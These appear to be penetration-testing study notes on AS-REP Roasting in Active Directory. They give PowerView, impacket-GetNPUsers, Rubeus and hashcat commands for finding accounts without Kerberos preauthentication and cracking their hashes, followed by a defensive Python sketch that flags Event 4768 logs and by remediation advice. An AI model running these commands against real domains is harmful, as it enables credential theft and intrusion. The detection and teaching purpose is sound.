AS-REP Roasting

A user account is vulnerable when its "Do not require Kerberos preauthentication" option is set, that is, when Kerberos preauthentication is disabled for it. An AS-REQ sent for that user is answered with an AS-REP, from which we obtain that user's hash.

  • Checking user

    • . .\Powerview.ps1

    • Get-DomainUser -PreauthNotRequired -Verbose

  • Extracting hash

    • 1st method, from Linux

      • impacket-GetNPUsers -dc-ip <ip> -request -outputfile <file-to-store-hash> <domain>/<user>

      • impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete

    • 2nd method, on a compromised Windows host using Rubeus

      • Using Rubeus

        • .\Rubeus.exe asreproast /nowrap

    • hash cracking

      • sudo hashcat -m 18200 hashes.asreproast /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/best64.rule --force
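
The defender's view of the same AS-REQ/AS-REP exchange, as an added example that is not part of the original notes: the domain controller records each TGT request as Security Event ID 4768, and a successful one with `PreAuthType` 0 means the AS-REP was issued without preauthentication. The sketch assumes those events were exported to CSV under the event's own field names; the sample rows and addresses are constructed.

```python
import csv
import io
from collections import defaultdict

# Constructed sample rows (not real logs): Security Event ID 4768 fields.
SAMPLE_4768 = """\
TimeCreated,TargetUserName,IpAddress,Status,TicketEncryptionType,PreAuthType
2024-05-01T09:00:01Z,alice,::ffff:192.0.2.10,0x0,0x12,2
2024-05-01T09:03:12Z,pete,::ffff:192.0.2.77,0x0,0x17,0
2024-05-01T09:03:13Z,dave,::ffff:192.0.2.77,0x0,0x17,0
2024-05-01T09:04:40Z,WEB01$,::ffff:192.0.2.20,0x0,0x12,2
2024-05-01T09:05:02Z,bob,::ffff:192.0.2.11,0x6,0xffffffff,-
"""

RC4_HMAC = 0x17  # etype 23, the type hashcat mode 18200 expects


def parse_events(text):
    """Read the CSV export into a list of dicts, one per 4768 event."""
    return list(csv.DictReader(io.StringIO(text)))


def no_preauth_tgts(events):
    """Return successful TGT requests answered without preauthentication."""
    hits = []
    for ev in events:
        if int(ev["Status"], 16) != 0:        # failed requests issue no AS-REP
            continue
        if ev["PreAuthType"].strip() != "0":  # "-", 2, 15, ... are not hits
            continue
        hits.append({
            "time": ev["TimeCreated"],
            "user": ev["TargetUserName"],
            "source": ev["IpAddress"].replace("::ffff:", ""),
            "rc4": int(ev["TicketEncryptionType"], 16) == RC4_HMAC,
        })
    return hits


def by_source(hits):
    """Group hit accounts per source address; many accounts from one host stands out."""
    grouped = defaultdict(set)
    for h in hits:
        grouped[h["source"]].add(h["user"])
    return {src: sorted(users) for src, users in grouped.items()}


if __name__ == "__main__":
    hits = no_preauth_tgts(parse_events(SAMPLE_4768))
    for src, users in by_source(hits).items():
        print(f"{src}: TGT issued without preauth for {', '.join(users)}")
```

Every hit is at least an account whose preauthentication setting should be re-enabled and whose password should be long and random.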
